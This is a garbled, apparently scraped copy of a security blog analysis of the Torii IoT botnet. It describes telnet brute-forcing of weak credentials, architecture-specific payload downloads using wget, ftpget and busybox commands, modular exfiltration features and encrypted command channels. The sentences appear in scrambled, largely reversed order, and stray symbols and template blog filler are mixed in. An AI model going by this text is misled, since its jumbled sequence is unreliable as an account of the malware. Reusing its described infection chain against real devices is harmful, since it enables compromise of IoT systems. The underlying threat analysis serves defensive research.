![]() It uses multiple commands to maximize the likelihood that it can deliver the payload. The malware uses several commands to download binary payloads by executing the following commands: “wget”, “ftpget”, “ftp”, “busybox wget”, or “busybox ftpget”. ![]() This allows Torii to infect a wide range of devices running on these very common architectures. The script initially tries to discover the architecture of the targeted device and then attempts to download the appropriate payload for that device.The list of architectures that Torii supports is quite impressive: including devices based on x86_64, x86, ARM, MIPS, Motorola 68k, SuperH, PPC – with various bit-width and endianness. This script looks quite different from typical scripts that IoT malware uses in that it is far more sophisticated. The infection chain starts with a telnet attack on the weak credentials of targeted devices followed by execution of an initial shell script. Now, let’s start with the infection vector. The analysis is still ongoing and further findings will be included in blog post updates. In this post, we will describe what we know about this strain so far, how it is spreading, what are its stages, and we will depict some of its features. We would like to give credit to, who actually tweet ed about a sample of this strain hitting his telnet honeypot last week.Īccording to this security researcher, telnet attacks have been coming to his honeypot from Tor exit nodes, so we decided to name this botnet strain “ Torii”. Definitely, one of the largest sets we’ve seen so far.Īs we’ve been digging into this strain, we’ve found indications that this operation has been running since December 2017, maybe even longer. Instead, it comes with a quite rich set of features for exfiltration of (sensitive) information, modular architecture capable of fetching and executing other commands and executables and all of it via multiple layers of encrypted communication.įurthermore, Torii can infect a wide range of devices and it provides support for a wide range of target architectures, including MIPS, ARM, x86, 圆4, PowerPC, SuperH, and others. Unlike the aforementioned IoT botnets, this one tries to be more stealthy and persistent once the device is compromised, and it does not (yet) do the usual stuff a botnet does like DDOS, attacking all the devices connected to the internet, or, of course, mining cryptocurrencies. Over the past week, we have been observing a new malware strain, which we call Torii, that differs from Mirai and other botnets we know of, particularly in the advanced techniques it uses. Any script kiddie now can use the Mirai source code, make a few changes, give it a new Japanese-sounding name, and then release it as a new botnet. 2018 has been a year where the Mirai and QBot variants just keep coming.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |